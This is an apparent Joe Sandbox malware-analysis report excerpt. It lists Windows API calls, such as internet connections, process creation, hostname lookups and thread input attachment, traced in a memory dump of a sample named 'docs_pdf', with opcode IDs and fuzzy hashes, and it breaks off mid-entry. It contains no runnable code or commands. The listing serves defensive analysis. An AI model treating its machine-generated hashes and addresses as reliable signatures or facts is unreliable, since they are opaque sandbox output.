                                      • Part of subcall function 00FB5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01017B20,?,?,00000000), ref: 00FB5B8C
                                      • Part of subcall function 00FB5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01017B20,?,?,00000000,?,?), ref: 00FB5BB0
                                    • _fprintf.LIBCMT ref: 00FD0C29
                                    • OutputDebugStringW.KERNEL32(?), ref: 01006331
                                      • Part of subcall function 00FD4CDA: _flsall.LIBCMT ref: 00FD4CF3
                                    • __setmode.LIBCMT ref: 00FD0C5E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                    • String ID:
                                    • API String ID: 521402451-0
                                    • Opcode ID: faba416e9e8fc89a2ccf3f68ee63a70f95135b494d4a837d6ac27ccbb78af7d7
                                    • Instruction ID: b5ea99d0bfcbf1230719eeea0f29013fcc39090ad78f613e715a8d2a589140f9
                                    • Opcode Fuzzy Hash: faba416e9e8fc89a2ccf3f68ee63a70f95135b494d4a837d6ac27ccbb78af7d7
                                    • Instruction Fuzzy Hash: 8B112432A042046BDB05B7B59C42AFE7B6A9F41320F18415BF204A7291DE7D6982AB95
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01021A97
                                      • Part of subcall function 01021B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 01021B40
                                      • Part of subcall function 01021B21: InternetCloseHandle.WININET(00000000), ref: 01021BDD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Internet$CloseConnectHandleOpen
                                    • String ID:
                                    • API String ID: 1463438336-0
                                    • Opcode ID: 42e7305639344b398a957e2ee6b5c2a76304314ffef163da08b082d7d2b75317
                                    • Instruction ID: db58711321d9fcc42770b893970256ff09ab3e2fb2bfebd632ca37f172336f25
                                    • Opcode Fuzzy Hash: 42e7305639344b398a957e2ee6b5c2a76304314ffef163da08b082d7d2b75317
                                    • Instruction Fuzzy Hash: E6219F35204616BFEB229F648C00FBBBBFDFF58601F00401AFA9596650EB7194119BA0
                                    APIs
                                      • Part of subcall function 0100F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0100E1C4,?,?,?,0100EFB7,00000000,000000EF,00000119,?,?), ref: 0100F5BC
                                      • Part of subcall function 0100F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0100F5E2
                                      • Part of subcall function 0100F5AD: lstrcmpiW.KERNEL32(00000000,?,0100E1C4,?,?,?,0100EFB7,00000000,000000EF,00000119,?,?), ref: 0100F613
                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0100EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0100E1DD
                                    • lstrcpyW.KERNEL32(00000000,?), ref: 0100E203
                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0100EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0100E237
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: lstrcmpilstrcpylstrlen
                                    • String ID: cdecl
                                    • API String ID: 4031866154-3896280584
                                    • Opcode ID: fa587f489e3a9535e72628a000e94b3beac412349a781067ea161b3a7dca510b
                                    • Instruction ID: 0de53b6601dd71dea8c364eb6f10d8ac1600c8f187f01bea919c8e51d6267691
                                    • Opcode Fuzzy Hash: fa587f489e3a9535e72628a000e94b3beac412349a781067ea161b3a7dca510b
                                    • Instruction Fuzzy Hash: 8811D336100302EFEB26AF68D844D7A77F9FF85310F40456AE946CB294EB719850D791
                                    APIs
                                    • _free.LIBCMT ref: 00FE5351
                                      • Part of subcall function 00FD594C: __FF_MSGBANNER.LIBCMT ref: 00FD5963
                                      • Part of subcall function 00FD594C: __NMSG_WRITE.LIBCMT ref: 00FD596A
                                      • Part of subcall function 00FD594C: RtlAllocateHeap.NTDLL(00B80000,00000000,00000001,00000000,?,?,?,00FD1013,?), ref: 00FD598F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 3db75d9e0ea960897cb2b494a98c104a3d89808a003045a919bba03c4327c115
                                    • Instruction ID: 8c10f8d3b66c0dcc222ea64c334d874daf3affb9360ea28f6120244a5b8cf1e5
                                    • Opcode Fuzzy Hash: 3db75d9e0ea960897cb2b494a98c104a3d89808a003045a919bba03c4327c115
                                    • Instruction Fuzzy Hash: EF112732D04A06AFCB302F72AC0175D379B5F10BF4F28442BF9459A291DE7A8941B791
                                    APIs
                                    • _memset.LIBCMT ref: 00FB4560
                                      • Part of subcall function 00FB410D: _memset.LIBCMT ref: 00FB418D
                                      • Part of subcall function 00FB410D: _wcscpy.LIBCMT ref: 00FB41E1
                                      • Part of subcall function 00FB410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FB41F1
                                    • KillTimer.USER32(?,00000001,?,?), ref: 00FB45B5
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FB45C4
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FED6CE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                    • String ID:
                                    • API String ID: 1378193009-0
                                    • Opcode ID: 5e38b4d30b26a6a284c3b5948dfb008c57bbf09f92f116ff2040765f419e3b55
                                    • Instruction ID: ea7591125164f08448b8e3876a1afbde57d8336b69e28d7e3e532658dd1252c1
                                    • Opcode Fuzzy Hash: 5e38b4d30b26a6a284c3b5948dfb008c57bbf09f92f116ff2040765f419e3b55
                                    • Instruction Fuzzy Hash: 5021DA71D047849FEB328B25D845BE7BBEC9F01314F04009DE6DE56246C7796A84AF51
                                    APIs
                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 010140D1
                                    • _memset.LIBCMT ref: 010140F2
                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 01014144
                                    • CloseHandle.KERNEL32(00000000), ref: 0101414D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                    • String ID:
                                    • API String ID: 1157408455-0
                                    • Opcode ID: 5aee7a0336c50019c2f6fd8e60fc15b56fd94cbe142739897d699ce3f9db0a73
                                    • Instruction ID: c78f154f4b06d85345cad1dd2aeb204756af6df92137e70cbe93118fa210f642
                                    • Opcode Fuzzy Hash: 5aee7a0336c50019c2f6fd8e60fc15b56fd94cbe142739897d699ce3f9db0a73
                                    • Instruction Fuzzy Hash: B3110D75D012287AD7305AA5AC4DFABBBBCEF45760F0041D6F908D7180D6744E40CBA5
                                    APIs
                                      • Part of subcall function 00FB5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01017B20,?,?,00000000), ref: 00FB5B8C
                                      • Part of subcall function 00FB5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01017B20,?,?,00000000,?,?), ref: 00FB5BB0
                                    • gethostbyname.WSOCK32(?,?,?), ref: 010266AC
                                    • WSAGetLastError.WSOCK32(00000000), ref: 010266B7
                                    • _memmove.LIBCMT ref: 010266E4
                                    • inet_ntoa.WSOCK32(?), ref: 010266EF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                    • String ID:
                                    • API String ID: 1504782959-0
                                    • Opcode ID: 91f752d5bf909519583f5c333da4401b81ef14d4499256ca9a3f887952040371
                                    • Instruction ID: 687d0be19b9c5f1b696b36cb3d809aa90801ee5695439fc24e22829bc8e2e4d4
                                    • Opcode Fuzzy Hash: 91f752d5bf909519583f5c333da4401b81ef14d4499256ca9a3f887952040371
                                    • Instruction Fuzzy Hash: 0911903590010AAFCB04FFA5DD86DEEB7BCAF44710B048065F502A7161DF39AE04DB61
                                    APIs
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 01009043
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01009055
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0100906B
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01009086
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 4c438d7165c4e6843603e0c443dcba9892a0c325cd8c387ff4f997ac5b394580
                                    • Instruction ID: f5170313c45212adad24b304627de3d57951db206bbb194a8debb1d38d423a8e
                                    • Opcode Fuzzy Hash: 4c438d7165c4e6843603e0c443dcba9892a0c325cd8c387ff4f997ac5b394580
                                    • Instruction Fuzzy Hash: A8114C79900219FFEB11DFA9C984E9DBBB8FB48310F204095FA44B7291D6726E10DB90
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                    • DefDlgProcW.USER32(?,00000020,?), ref: 00FB12D8
                                    • GetClientRect.USER32(?,?), ref: 00FEB84B
                                    • GetCursorPos.USER32(?), ref: 00FEB855
                                    • ScreenToClient.USER32(?,?), ref: 00FEB860
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Client$CursorLongProcRectScreenWindow
                                    • String ID:
                                    • API String ID: 4127811313-0
                                    • Opcode ID: af2f6e973947e6b4803cbedfdce1e7eff0255321cf53fc7b94d3c024add1db5f
                                    • Instruction ID: 022ac3a93d41ce5770b30773c2757d88442098626e77b3e35f0d24dc612ec051
                                    • Opcode Fuzzy Hash: af2f6e973947e6b4803cbedfdce1e7eff0255321cf53fc7b94d3c024add1db5f
                                    • Instruction Fuzzy Hash: C7113A36A0001AAFCB14EFA5D895DFE77B8FB05301F500456F951E7240C735BA51AFA5
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,010101FD,?,01011250,?,00008000), ref: 0101166F
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,010101FD,?,01011250,?,00008000), ref: 01011694
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,010101FD,?,01011250,?,00008000), ref: 0101169E
                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,010101FD,?,01011250,?,00008000), ref: 010116D1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CounterPerformanceQuerySleep
                                    • String ID:
                                    • API String ID: 2875609808-0
                                    • Opcode ID: 1258f2659d3227033e6ae5855e8258b8b059f53d8bb2da4c5e98883bd889eb72
                                    • Instruction ID: 44eeb4375dfa2f6d60ad0c195d19f26a20997bfa03f0f4447756c371abcc92dc
                                    • Opcode Fuzzy Hash: 1258f2659d3227033e6ae5855e8258b8b059f53d8bb2da4c5e98883bd889eb72
                                    • Instruction Fuzzy Hash: 7E115A31D0051DDBCF149FE5E848AEEBF78FF09741F084489EAC0B6248CB3A55608B96
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                    • String ID:
                                    • API String ID: 3016257755-0
                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                    • Instruction ID: dcd467074f7b32898a70f948a34e2a91ac95222207245c72258bec94b00c3309
                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                    • Instruction Fuzzy Hash: 0301493644828ABBCF126E96DC018EE3F62BF69351B598615FB1858031D237C9B1BF81
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 0103B59E
                                    • ScreenToClient.USER32(?,?), ref: 0103B5B6
                                    • ScreenToClient.USER32(?,?), ref: 0103B5DA
                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0103B5F5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ClientRectScreen$InvalidateWindow
                                    • String ID:
                                    • API String ID: 357397906-0
                                    • Opcode ID: fb3a6fd11e2e92e5a7b7f7b979a8ccf0d8191da149bb5e6610615d2a905c4400
                                    • Instruction ID: fbf7427a8fe0311fac3b1c29bc9e6e5f9b0bdf60b2d1fc54c0e7b56404ed599e
                                    • Opcode Fuzzy Hash: fb3a6fd11e2e92e5a7b7f7b979a8ccf0d8191da149bb5e6610615d2a905c4400
                                    • Instruction Fuzzy Hash: B71163B9D0020AEFDB51DFA9C484AEEFBF9FB08310F108156E954E3210D735AA559F91
                                    APIs
                                    • _memset.LIBCMT ref: 0103B8FE
                                    • _memset.LIBCMT ref: 0103B90D
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01077F20,01077F64), ref: 0103B93C
                                    • CloseHandle.KERNEL32 ref: 0103B94E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memset$CloseCreateHandleProcess
                                    • String ID:
                                    • API String ID: 3277943733-0
                                    • Opcode ID: 9fcff193cd95e4ba76e6244b020e648e8899b8f6e8173c30f66deeb51d55b53f
                                    • Instruction ID: 75136552954cbd485c7ac0f77dadd79f40a9687fcfe8308988d0ed0033658744
                                    • Opcode Fuzzy Hash: 9fcff193cd95e4ba76e6244b020e648e8899b8f6e8173c30f66deeb51d55b53f
                                    • Instruction Fuzzy Hash: F5F089B19403007BF2203765AD0DF7B3A5CEB09398F004011FB48E6286D77A491087A9
                                    APIs
                                    • EnterCriticalSection.KERNEL32(?), ref: 01016E88
                                      • Part of subcall function 0101794E: _memset.LIBCMT ref: 01017983
                                    • _memmove.LIBCMT ref: 01016EAB
                                    • _memset.LIBCMT ref: 01016EB8
                                    • LeaveCriticalSection.KERNEL32(?), ref: 01016EC8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                    • String ID:
                                    • API String ID: 48991266-0
                                    • Opcode ID: 536cabab442aa33f1e498b8419b090e3ec674531b28a349d455ef6c489f94687
                                    • Instruction ID: 6cc86ebcfb75a08bb78c408e80975a4de8e672a3d373bc73f6a92953382a0b3a
                                    • Opcode Fuzzy Hash: 536cabab442aa33f1e498b8419b090e3ec674531b28a349d455ef6c489f94687
                                    • Instruction Fuzzy Hash: DBF0543A500200BBCF116F55DC84E89BB2AEF45320B08C055FE089E21AC775A911DBB5
                                    APIs
                                      • Part of subcall function 00FB12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FB134D
                                      • Part of subcall function 00FB12F3: SelectObject.GDI32(?,00000000), ref: 00FB135C
                                      • Part of subcall function 00FB12F3: BeginPath.GDI32(?), ref: 00FB1373
                                      • Part of subcall function 00FB12F3: SelectObject.GDI32(?,00000000), ref: 00FB139C
                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0103C030
                                    • LineTo.GDI32(00000000,?,?), ref: 0103C03D
                                    • EndPath.GDI32(00000000), ref: 0103C04D
                                    • StrokePath.GDI32(00000000), ref: 0103C05B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                    • String ID:
                                    • API String ID: 1539411459-0
                                    • Opcode ID: bb3a05f620b5ad4fde42701a8bd2cfb3fdbef3c7ad628fd473cb795a93c8a9b5
                                    • Instruction ID: 8cb880905b2469541c81d3d8807fa50d50537055c935b85b6eda08ffa5a5d16e
                                    • Opcode Fuzzy Hash: bb3a05f620b5ad4fde42701a8bd2cfb3fdbef3c7ad628fd473cb795a93c8a9b5
                                    • Instruction Fuzzy Hash: A7F09A3140025ABAEB222E58AC09FCA3F98AF06310F044100FA92610D1C76A1260CF96
                                    APIs
                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0100A399
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0100A3AC
                                    • GetCurrentThreadId.KERNEL32 ref: 0100A3B3
                                    • AttachThreadInput.USER32(00000000), ref: 0100A3BA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                    • String ID:
                                    • API String ID: 2710830443-0
                                    • Opcode ID: 7b1be3c0f08cf98664e16f205f4215103fe62e1e85109a5767333d0a2102c16f
                                    • Instruction ID: 88bcf47595876e960b2ad0bdba0d9246cbc803c71d157fea2695b21fb444dad7
                                    • Opcode Fuzzy Hash: 7b1be3c0f08cf98664e16f205f4215103fe62e1e85109a5767333d0a2102c16f
                                    • Instruction Fuzzy Hash: 66E0C931A45329BBEB215AA2DC0DEDB7F5CEF2A7A1F008015F689D50A0C6B68540DBA1
                                    APIs
                                    • GetSysColor.USER32(00000008), ref: 00FB2231
                                    • SetTextColor.GDI32(?,000000FF), ref: 00FB223B
                                    • SetBkMode.GDI32(?,00000001), ref: 00FB2250
                                    • GetStockObject.GDI32(00000005), ref: 00FB2258
                                    • GetWindowDC.USER32(?,00000000), ref: 00FEC0D3
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FEC0E0
                                    • GetPixel.GDI32(00000000,?,00000000), ref: 00FEC0F9
                                    • GetPixel.GDI32(00000000,00000000,?), ref: 00FEC112
                                    • GetPixel.GDI32(00000000,?,?), ref: 00FEC132
                                    • ReleaseDC.USER32(?,00000000), ref: 00FEC13D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
